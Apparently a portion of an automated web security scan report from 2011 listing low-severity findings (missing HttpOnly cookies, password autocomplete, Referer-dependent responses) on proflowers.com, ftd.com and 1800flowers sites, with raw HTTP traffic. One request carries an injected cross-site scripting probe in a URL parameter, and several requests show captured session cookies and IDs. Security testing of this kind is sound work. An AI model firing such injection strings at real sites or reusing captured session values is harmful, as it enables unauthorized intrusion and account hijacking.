Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 12:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E3EC9C05010F51-40000101E0246B4D[CE]; Expires=Sat, 7 May 2016 12:08:24 GMT; Domain=.proflowers.com; Path=/
Location: http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883?AQB=1&pccr=true&vidn=26E3EC9C05010F51-40000101E0246B4D&&ndh=1&t=9%2F4%2F2011%207%3A8%3A20%201%20300&ns=proflowers1&pageName=PFC%3Ahome%3Ahome&g=http%3A%2F%2Fwww.proflowers.com%2F&cc=USD&ch=PFC%3Ahome&server=PRVD36&c1=PFC%3Ahome%3AHPC&c2=5%3A00AM&c3=Monday&v4=PFC&c5=na%3Ana%3Ana%3Ana&v5=HPC&v7=27&c11=PFC&c12=true&v12=pfb0%3Apku1%3Apkv2%3Apml0%3Apfl0%3A%3A%3Apfe3%3Apec3%3Apem1%3Apmm2%3A%3A%3A%3Appr2%3Axpa1%3Apsr2%3Aapg1%3A&c13=false&c14=true&v22=5%3A00AM&v23=Monday&c28=91621bab-4967-45f8-ad8e-98be730e6e4a&v31=-1&c35=CUS&v35=empty%20code&v39=pvo2%3A%3A%3A%3Apnp3%3Apxa2%3Apxb1%3Apxc1%3A%3A%3Apks3%3Apkt1%3Azzd2%3Azze1%3Aphl2%3Aphr2%3Azzf2%3Axpc1%3A&v49=%3A%3A%3A%3A%3Apbo5%3A%3Appv3%3A%3Anta1%3Antb1%3Antc1%3Antd2%3Ante2%3Apmt3%3A%3Axpb1%3Aprh1%3A&v50=PFC%3AUSA&v52=PFC&c53=D%3Dv53&v53=homepage001&c54=D%3Dv54&v54=pfc_control_050811&c55=D%3Dv55&v55=PFC%3Ahome%3Ahomepage%3Apfc_control_2011-05-07&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 12:08:24 GMT
Last-Modified: Tue, 10 May 2011 12:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www15
Content-Length: 0
Content-Type: text/plain


13.57. http://www.ftd.com/351

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /351

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Set-Cookie: TLTSID=B6A5C1A479D710790018F9E37C66E2B0; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=B6A5C1A479D710790018F9E37C66E2B0; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:00:21 GMT
Location: http://www.ftd.com/351/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 350
Date: Mon, 09 May 2011 01:00:21 GMT
X-Varnish: 540312318
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.ftd.com/351/">h
...[SNIP]...

14. Password field with autocomplete enabled
There are 9 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


14.1. https://accounts.proflowers.com/CustomerLogin.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://accounts.proflowers.com
Path:   /CustomerLogin.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /CustomerLogin.aspx?Ref=HomeNoRef HTTP/1.1
Host: accounts.proflowers.com
Connection: keep-alive
Referer: https://accounts.proflowers.com/Default.aspx?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=tjb3lzavlroebrfrqg11rbq2; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; domain=.proflowers.com; expires=Mon, 09-May-2061 12:15:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:15:32 GMT
Content-Length: 60636

<link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/pfc_youraccount_styles.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='https:
...[SNIP]...
<body>
<form name="form1" method="post" action="CustomerLogin.aspx?Ref=HomeNoRef" onsubmit="javascript:return WebForm_OnSubmit();" id="form1" onkeydown="javascript:return EnterKeyPressed(event);">
<div>
...[SNIP]...
<td colspan="2"><input name="Login$tb_Password" type="password" maxlength="15" id="Login_tb_Password" /></td>
...[SNIP]...

14.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx?flexShown=False&scAddItem=true&flexChosen=False&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&selectedrelationshipID=293461&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&trackingpgroup=PBS&deliveryon=True HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:05 GMT
Content-Length: 49219


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...
<div id="innerContainer">
               <form name="aspnetForm" method="post" action="IdentifyCustomer.aspx?flexShown=False&amp;scAddItem=true&amp;flexChosen=False&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;selectedrelationshipID=293461&amp;op=new&amp;quantity=1&amp;Ref=HomeNoRef&amp;deliverydate=5%2f25%2f2011&amp;pid=30008396&amp;ssid=27&amp;COBRAND=pfc&amp;ShowGiftOptions=True&amp;trackingpgroup=PBS&amp;deliveryon=True" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
</span> <input name="ctl00$OrderProcessPageBody$ctl05$tb_Password" type="password" maxlength="15" id="ctl00_OrderProcessPageBody_ctl05_tb_Password" class="SignInTextBox" /><br/>
...[SNIP]...

14.3. http://ww30.1800baskets.com/product.do

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

POST /product.do HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
Origin: http://ww30.1800baskets.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000jc-mR2VDw7uBY5v5sZbAO-H:-1; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784
Content-Length: 660

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=11097&hospitalDataset=11096&funeralHomeDataset=11092&ruralRouteDataset=11093&dataset=11309&channel=&
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 01:18:24 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 34787


<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<meta name="robots" content="noindex,nofollow"/>


<title>Error Occurr
...[SNIP]...
</tr>
                               <form action="https://ww30.1800baskets.com/signinaction.do" method="post" name="welcomesignin">
                                   
                                       <input type="hidden" name="welcomePage" value="error.do" />
...[SNIP]...
<br>
                                    <input type="password" style="width:100px" name="password" class="textfield" maxlength="64" onkeypress="if(event.keyCode==13){document.forms['welcomesignin'].submit();}" /><a class="arrowlink" href="javascript:document.forms['welcomesignin'].submit()">
...[SNIP]...

14.4. https://ww30.1800flowers.com/checkoutsignin.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:06 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...
<div class="n-chk-Signin n-chkTextAlign">    
       <form name="SignInForm" method="post" action="/signinactionForCheckout.do" id="SignInForm">    
       <input type="hidden" name="welcomePage" value="https://ww30.1800flowers.com/shipping.do" />
...[SNIP]...
<div>            
                               
        <input type="password" name="password" maxlength="64" value="" class="n-textfield"><br/>
...[SNIP]...

14.5. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:25 GMT
X-Varnish: 1301369291 1301357425
Age: 227
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136169


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/351/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

14.6. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001">
<form style="margin:0px;" action="https://ordering.ftd.com/350/signin/">
<table width="240" border="0" cellpadding="1">
...[SNIP]...
</label>
<input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

14.7. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902822159

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:25 GMT
X-Varnish: 1301369291 1301357425
Age: 227
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136169


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001"> <form style="margin:0px;" action="https://ordering.ftd.com/351/signin/"> <table width="240" border="0" cellpadding="1">
...[SNIP]...
</label> <input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

14.8. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div style="margin-bottom:20px; margin-top:15px;"><form name="create_account" id="create_account" method="post" action="" onsubmit="if(document.create_account.email_isvalid.value == 1){ FS.create_account(); }else{ valid_email(document.create_account.email.value, 1,'You have entered an invalid email address', function (){document.create_account.email_isvalid.value = 1; FS.create_account();});} return false;" style="margin:0px;"><table width="600" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password" id="password" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...
<td height="35" valign="middle"><input type="password" name="password_ver" id="password_ver" style="border:1px solid #d1bc61; width:200px; height:28px; padding:4px;" maxlength="18"/></td>
...[SNIP]...

14.9. http://www.ftd.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273">

<form action="https://ordering.ftd.com/350/signin/">
<table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

15. Referer-dependent response
There are 4 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the content of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



15.1. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

Request 1

